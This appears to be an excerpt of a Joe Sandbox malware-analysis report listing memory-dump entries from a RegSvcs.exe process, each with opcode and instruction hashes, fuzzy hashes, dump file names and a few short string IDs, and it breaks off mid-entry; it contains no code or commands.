                                                      • Opcode ID: 822e35c5a9cd81609d301f0d5424cf7fe4af4a0feb5b477577c223d8c17b5ac3
                                                      • Instruction ID: 40db59e8370c44e8a1256d61821b6670e2ea5cb6627c76167ea86bee388ea31d
                                                      • Opcode Fuzzy Hash: 822e35c5a9cd81609d301f0d5424cf7fe4af4a0feb5b477577c223d8c17b5ac3
                                                      • Instruction Fuzzy Hash: B6914D70E1021A8BDF60DF68C890B9DB7B1FF89304F208699D54DBB255DB70AA85CF91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2232b3bfc8c8d1bb08077f4bc836fe9f2030961ca12e05d4d5c09eaa5ef5464e
                                                      • Instruction ID: 20875027db4bc05526064917310f666f43efca332319ba9ae601f1c0a150cb69
                                                      • Opcode Fuzzy Hash: 2232b3bfc8c8d1bb08077f4bc836fe9f2030961ca12e05d4d5c09eaa5ef5464e
                                                      • Instruction Fuzzy Hash: C5710670B002199FDB54DFA8D990A9EBBF6FF88300F14846AE406EB255DB34ED46CB50
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b06a33855e464241c373792f8169cba7bf89ea58fe543b1a23681ac987a5cdb1
                                                      • Instruction ID: 43f81627a35e38106d2fae62b0f351d2364063491e1fbff8070d720323c1bc7a
                                                      • Opcode Fuzzy Hash: b06a33855e464241c373792f8169cba7bf89ea58fe543b1a23681ac987a5cdb1
                                                      • Instruction Fuzzy Hash: B8711774B002199FDB54DFA8D990A9EBBF6FF88300F14846AD406EB255DB34ED46CB50
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb7f05334498895676c2c3d5729060030b294bc357089a1bf7c1535375cb0ade
                                                      • Instruction ID: f5f57690af85b0ece78c986ce705102b61d2b25af102239bc7741eb785087b5d
                                                      • Opcode Fuzzy Hash: bb7f05334498895676c2c3d5729060030b294bc357089a1bf7c1535375cb0ade
                                                      • Instruction Fuzzy Hash: 4B51E0B1F012259FCB54EFB8E4546BEB7B6EF84310F1088BAE51AD7250DB358945CB81
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ac2d765874c90456029a769e3dc0e6bb9e095191f468230690229d00a603f01
                                                      • Instruction ID: a27a17712d106880d8a6217a5e3b9d1a3dd9c1fef4ee57bb8c60029a18afc8d7
                                                      • Opcode Fuzzy Hash: 6ac2d765874c90456029a769e3dc0e6bb9e095191f468230690229d00a603f01
                                                      • Instruction Fuzzy Hash: F451B3F4F502249BEFA45ABCEA5477F365EDB89310F104876E80AD7795C92CCC4583A2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 549dc15639700f1e5a42d7f40f02b4ca0bb222febf3007c29e55b6a442937021
                                                      • Instruction ID: 8ec0e0fe2e8b35ff91b6861bfc2324e0cdf55dd1789ffb4ce81db3b5a085f115
                                                      • Opcode Fuzzy Hash: 549dc15639700f1e5a42d7f40f02b4ca0bb222febf3007c29e55b6a442937021
                                                      • Instruction Fuzzy Hash: 9D51D6F4F502249BEFA45ABCEA5473F365EDB89310F204836E80AD7395C92CCC458392
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88044f83ac39da9845254583c275e00ed88b6c21246732f3283c9b8374f86e1b
                                                      • Instruction ID: b76b50e0a595764299b1759db06693139fd5d298a43b4185f5983bdd2af12148
                                                      • Opcode Fuzzy Hash: 88044f83ac39da9845254583c275e00ed88b6c21246732f3283c9b8374f86e1b
                                                      • Instruction Fuzzy Hash: 94416DB2F006198FCF70CEA9D881AAFFBB2EB84310F10496AD216D7640D731E9558B91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e978cd1474d13e73dc64612c66a823de5ebde4ea61002c354c395eb8b3b7074
                                                      • Instruction ID: 6005a5aa69b56852261114047d91d4ef90b05f7714f241a5590496bd245bbb18
                                                      • Opcode Fuzzy Hash: 3e978cd1474d13e73dc64612c66a823de5ebde4ea61002c354c395eb8b3b7074
                                                      • Instruction Fuzzy Hash: 6431CB71F106199BCB49CF65D954AAEB7F2FF89300F108529E806E7740EB71AD46CB50
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 985cc63b40c87987a20d374950d0e16eba1b791bf1d0395ee79544a471a57f0a
                                                      • Instruction ID: a578e76247f62d8635bab9ddd595a3f3899f03d952cec8897cff2a0067f510f9
                                                      • Opcode Fuzzy Hash: 985cc63b40c87987a20d374950d0e16eba1b791bf1d0395ee79544a471a57f0a
                                                      • Instruction Fuzzy Hash: 1331AE70F106199BCB49CF65C954AAEB7F2FF89300F108529E806E7750EB71AD46CB40
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d8bbffd6c8b5053e89752e7c09bb0dcc18d21d7330ff672b43c2ba38ff6c4e2
                                                      • Instruction ID: fc233b65c36d2ef2436779d3e59ca4beb3382aa77a6c71bd00b2061b54a4052a
                                                      • Opcode Fuzzy Hash: 5d8bbffd6c8b5053e89752e7c09bb0dcc18d21d7330ff672b43c2ba38ff6c4e2
                                                      • Instruction Fuzzy Hash: DA21ADB5F01615AFDB50CF78EC80AAEBBF5EB48710F004065E905EB380E738D8418BA1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0069014d5349d0c754a3fe3a13b95d349ca900861c0b29162a3d6b54c95589c
                                                      • Instruction ID: 8a92f8269f9a83d60e8c79a04bfa089f11c9d3f405fe94182a1fd9c479a529cd
                                                      • Opcode Fuzzy Hash: f0069014d5349d0c754a3fe3a13b95d349ca900861c0b29162a3d6b54c95589c
                                                      • Instruction Fuzzy Hash: 22217CB5F006259FDB50CF79D880AAEBBF1EB48710F108069E905E7350E738DD018B95
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296184362.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_183d000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 564c3d611d64b9595c4f11ac784f00515aab9175310dcecfa8a9c14bc61fea46
                                                      • Instruction ID: bcf1f20f7b7aa0630a5de06e85fbf273c4823ab1ff82ce31e70c8c9d785a742d
                                                      • Opcode Fuzzy Hash: 564c3d611d64b9595c4f11ac784f00515aab9175310dcecfa8a9c14bc61fea46
                                                      • Instruction Fuzzy Hash: 18214270504204DFCB11DFA8C9D0B26FBA5FBC4718F68C66DE8098B252C37AD406CAA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 509f1bbcf28e0719becb45719d324a75dcffeb7de1844218c54a5a88b1c9d994
                                                      • Instruction ID: 08dc27a864c9284475a6d09acb14bd0ca9366dcb060779d11cda6d52d6619004
                                                      • Opcode Fuzzy Hash: 509f1bbcf28e0719becb45719d324a75dcffeb7de1844218c54a5a88b1c9d994
                                                      • Instruction Fuzzy Hash: 5C0128307042241FCB62867DD850B1FBBDADBCA310F11447AE50AC7791DD15CC0283E2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 420ec647a3fb9df3bbf544d27f7e7e2acdf4d343c032fc73d057513fe51bbd71
                                                      • Instruction ID: 7a3e1ffdf863645782d48f01ce6e3e485b1425192ac98d87d83f9b50fd611480
                                                      • Opcode Fuzzy Hash: 420ec647a3fb9df3bbf544d27f7e7e2acdf4d343c032fc73d057513fe51bbd71
                                                      • Instruction Fuzzy Hash: AB11A132F042259FDB849A78D8146AF73EAEBC8310F004179D80AE7340EE75DC068BD1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: acf46bf075e26e4bb579b06edef30ab75281ff2ff609df77a59036374fd4db8d
                                                      • Instruction ID: 2a3facca346fdd3111ec19af33df3d9aca9bc70a569788d1684da66e9b605079
                                                      • Opcode Fuzzy Hash: acf46bf075e26e4bb579b06edef30ab75281ff2ff609df77a59036374fd4db8d
                                                      • Instruction Fuzzy Hash: 6901D435B142210BCBA59A3C9420B6F7BDADBCA610F10887BE50EC7340DA15DC0387D6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a638f2270ab89c6ad4fecf26596d0ba38c5a8d574967126038a5e90f56257e6e
                                                      • Instruction ID: 6af6b4464a94ed7e8bdeeb5ab9359526d2302eaeace687aed03f049121738b53
                                                      • Opcode Fuzzy Hash: a638f2270ab89c6ad4fecf26596d0ba38c5a8d574967126038a5e90f56257e6e
                                                      • Instruction Fuzzy Hash: 1A01F232F041396BDB84996CDC106EF76EBEBC9200F45417AD90AE7280EE65DC0647E2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f58b379fb27986805692e902151473d5717080988258aca39e065cb40324c7a0
                                                      • Instruction ID: 06a612f101475f05456b061e3980f69a953c92b86f5d55717e17b4e88a53c0d7
                                                      • Opcode Fuzzy Hash: f58b379fb27986805692e902151473d5717080988258aca39e065cb40324c7a0
                                                      • Instruction Fuzzy Hash: 0521F4B1D01259EFCB10DF9AD884ACEFFB4FB48310F10816AE518A7200C3786554CFA5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296184362.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_183d000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: bd871b02a5af7de4be6184790abfdf079a86bc28885b05256d5e70de963bc71a
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 9D11BB75504280CFDB12CF58D5D4B15FFA1FB84314F28C6AAD8498B656C33AD44ACBA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bad62c7cde3f03c990aba93e6dc8da270dc413f287d134d451b2074c599ece1
                                                      • Instruction ID: 5a1486a6359b91dc51d65f5ee263f748b36fae96b77c7c9e9366a99b01093081
                                                      • Opcode Fuzzy Hash: 1bad62c7cde3f03c990aba93e6dc8da270dc413f287d134d451b2074c599ece1
                                                      • Instruction Fuzzy Hash: 1701D430B152210FCB61DB3CD46075F77E2EB8A710F204479E50AD7351DE28DD468381
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67ae7e6ed4fe27d5ec092cb7bba3f0aa1637750a12db96706dc575ffa57b19a1
                                                      • Instruction ID: 0a74b8d26c7b18ef7e88e0081333b9c213fea49d66b011e58df2ba44dd6a2461
                                                      • Opcode Fuzzy Hash: 67ae7e6ed4fe27d5ec092cb7bba3f0aa1637750a12db96706dc575ffa57b19a1
                                                      • Instruction Fuzzy Hash: E711D3B1D01259AFCB00DF9AD884ADEFFF4FB49310F10816AE518A7201C378A544CFA5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52552cf75ab11ef91efef4beea5da031090f310b8b4b500a355b48d717aeed2f
                                                      • Instruction ID: 74944908294e18d0a85b4359d903aa5368d503639bb30c7d14452cab5d1dad1c
                                                      • Opcode Fuzzy Hash: 52552cf75ab11ef91efef4beea5da031090f310b8b4b500a355b48d717aeed2f
                                                      • Instruction Fuzzy Hash: C501F431B001210BDB659A7DD454B2FB6DBDBC9710F108839E60FC7740EE66DC024395
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db86054bb2b280d2f3a50231cb6dbb95f0c16e9833b10025fb43d345500927e4
                                                      • Instruction ID: a509cdae07b6604fda9da698cfd2a19b753a39e5b35c957bce5c4507e36eda94
                                                      • Opcode Fuzzy Hash: db86054bb2b280d2f3a50231cb6dbb95f0c16e9833b10025fb43d345500927e4
                                                      • Instruction Fuzzy Hash: C1018175B102310BCBA5992D9464B2E76DADBC9610F10883BE50AC7340EE29EC0347D6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d5a042e0c2bd7c265a8807634a4f55e7d1d42d94430448ef0e6b24d08c33e2ac
                                                      • Instruction ID: 206fc4a61bcb91e6eb592fa42ecb15a8848a3592b62cf32566834788d108cd26
                                                      • Opcode Fuzzy Hash: d5a042e0c2bd7c265a8807634a4f55e7d1d42d94430448ef0e6b24d08c33e2ac
                                                      • Instruction Fuzzy Hash: B3018170B105244BCB61DA3DD464B1E77D6EB89710F208879E50ED7340EE29DD428781
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c3e03f6326631901fe4051d14a3b698a49c7d057906ad09f1adb8557c6d8529
                                                      • Instruction ID: 047dc9dee7d5c82e1d8c50bc971f8218d47b94bd411a66644efb1e06df495353
                                                      • Opcode Fuzzy Hash: 0c3e03f6326631901fe4051d14a3b698a49c7d057906ad09f1adb8557c6d8529
                                                      • Instruction Fuzzy Hash: A201F471F102389BCB549EA9E840A99BB7AFB84310F008479E901FB340DB39AD048BC0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 707fb7557c03db78c9201620b2157ee4336418e11e3a5ee8a6f5ea2974f147d0
                                                      • Instruction ID: c54abad5213d4a5de832ee73201dbb62d6f16f0660c9717db6654c69ad2ac8c7
                                                      • Opcode Fuzzy Hash: 707fb7557c03db78c9201620b2157ee4336418e11e3a5ee8a6f5ea2974f147d0
                                                      • Instruction Fuzzy Hash: 42F06DB0A192A87FDF51CA748D0569B7BBED703208F1154F6E504CB143E276CE4187A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-2843079600
                                                      • Opcode ID: e6a8ec7ff0b5ff5366652b60bc2552fb1fc642bb6a78cfa824913da38194a74b
                                                      • Instruction ID: a662543e3110227f1cc5aaaf90e5ac0cfd9591d4e4efbbbb9ddf70ee852b9057
                                                      • Opcode Fuzzy Hash: e6a8ec7ff0b5ff5366652b60bc2552fb1fc642bb6a78cfa824913da38194a74b
                                                      • Instruction Fuzzy Hash: BB122AB0F006298FDB64DF69C894A9DB7B2FF88304F2095A9D409AB254DB34AD45CF84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0odp$Dqdp$PH]q
                                                      • API String ID: 0-4272097961
                                                      • Opcode ID: 0f22e50cf4eebd832c90a48c95cb9070c1d8358f5d448fea6b2a24add431e5bc
                                                      • Instruction ID: 405cb30a83dfbaa2e2901b35ee5d3dcc1b99b99b7f5a38c4a9d698ef6f246b28
                                                      • Opcode Fuzzy Hash: 0f22e50cf4eebd832c90a48c95cb9070c1d8358f5d448fea6b2a24add431e5bc
                                                      • Instruction Fuzzy Hash: 9322B074B001158FCB94DF68D494AAEB7E6FF88310F1085AAD40ADB3A1DB35EC46CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: XPbq$\Obq
                                                      • API String ID: 0-409418754
                                                      • Opcode ID: b2450ceb9a28932ce19035bcbfb8bb8cc9d9072636ff0fb0beb8676470936d9c
                                                      • Instruction ID: d49ec5616bcfb7bdd31aa58e2f8fda886b6f0829c5aa29a6746c741d52568972
                                                      • Opcode Fuzzy Hash: b2450ceb9a28932ce19035bcbfb8bb8cc9d9072636ff0fb0beb8676470936d9c
                                                      • Instruction Fuzzy Hash: 7AE13771B101249FDB64DB6CC494AAEBBF6FF89310F2084AAE506DB351DA35DC41CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c233f3ee1cc1209a8c21bfa6db16f2261861ca317749617ee33290c572833b0
                                                      • Instruction ID: 919e349b975d544c756a7b02cdf4384bd41ea8cf445bd2cb57befd451cdb420a
                                                      • Opcode Fuzzy Hash: 4c233f3ee1cc1209a8c21bfa6db16f2261861ca317749617ee33290c572833b0
                                                      • Instruction Fuzzy Hash: AA230A31D10A1A8EDB10EF68C89059DF7B1FF99300F15D69AE458B7221EB70AAD5CF81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VUo
                                                      • API String ID: 0-3530549468
                                                      • Opcode ID: d9248ebc680c909f66164537e733480f22f051c03a1e2b5433d4e15199b68ef7
                                                      • Instruction ID: 5b9d41875eecc94df80a6a9c48ab034382467a884d7b78a669dac0b3bff42387
                                                      • Opcode Fuzzy Hash: d9248ebc680c909f66164537e733480f22f051c03a1e2b5433d4e15199b68ef7
                                                      • Instruction Fuzzy Hash: 6DB14F70E40209CFDF14CFA9D89579DBBF2AF88708F14D129E419AB294EB74A845CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84dd9e2cee6d47bfe1a7c3e6763c1ca91df8e6eace1aeac32665625cd08791e7
                                                      • Instruction ID: 51a7a600741ddec71c6fc365e656f3e8fd0969c9393767069e7bdb83db82d75b
                                                      • Opcode Fuzzy Hash: 84dd9e2cee6d47bfe1a7c3e6763c1ca91df8e6eace1aeac32665625cd08791e7
                                                      • Instruction Fuzzy Hash: 88A19172E0022ACFCF45DFB5C84459EB7F2FF85310B1541AAE919AB225DB35D946CB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-1273862796
                                                      • Opcode ID: 6787b1001e63b7265a017953764abe7f31a60dbb159ee8e79234aa729c3edc53
                                                      • Instruction ID: f1b96e9cc606e9fe18041c67ac0438e01c3f13228cb5991411f6093f396d2325
                                                      • Opcode Fuzzy Hash: 6787b1001e63b7265a017953764abe7f31a60dbb159ee8e79234aa729c3edc53
                                                      • Instruction Fuzzy Hash: 6B917170F002199FDB58DF68D994B6EB7F6FF84300F208569E885AB294DB389D41CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-981061697
                                                      • Opcode ID: 6c2e2ca72a4ade5c771a46ead6b867ac37c0482db57019a148dba8511a437dd6
                                                      • Instruction ID: 7b9b9dad13d2d031db7649a47f0edd4749ddb32dff6b5e0b2d3327040087a25b
                                                      • Opcode Fuzzy Hash: 6c2e2ca72a4ade5c771a46ead6b867ac37c0482db57019a148dba8511a437dd6
                                                      • Instruction Fuzzy Hash: EFF13CB4B002198FDB58DFA8D564A6EB7B6FF84300F208578D8059B395CB79AC42CB95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q
                                                      • API String ID: 0-858218434
                                                      • Opcode ID: 8bc8b6387fb35fba6f30f4ac194654da0d3f30dbf66470378ab561ac21e799d0
                                                      • Instruction ID: eddb2964d414837d1284e73143ed674d9c6897c30f8b8723d02491926b5a7b64
                                                      • Opcode Fuzzy Hash: 8bc8b6387fb35fba6f30f4ac194654da0d3f30dbf66470378ab561ac21e799d0
                                                      • Instruction Fuzzy Hash: 9EB13970F00219CFDB55DFA8D59069EB7A6EF84300F248469E4069B354DB78DD82CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q
                                                      • API String ID: 0-858218434
                                                      • Opcode ID: 57d9062001a2fa43107fe63aff42a35cb5bcd5d5fdd9b89394cd28155cc65e19
                                                      • Instruction ID: 1bb76d833eec8ff157a0f965a34823cc0d809e7b3e0e4d88ea2bfce5aff58bf1
                                                      • Opcode Fuzzy Hash: 57d9062001a2fa43107fe63aff42a35cb5bcd5d5fdd9b89394cd28155cc65e19
                                                      • Instruction Fuzzy Hash: 8451B274F102259FCB65DF68D590AAEB7B2EF84300F2095A9E845EB254DB39EC41CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
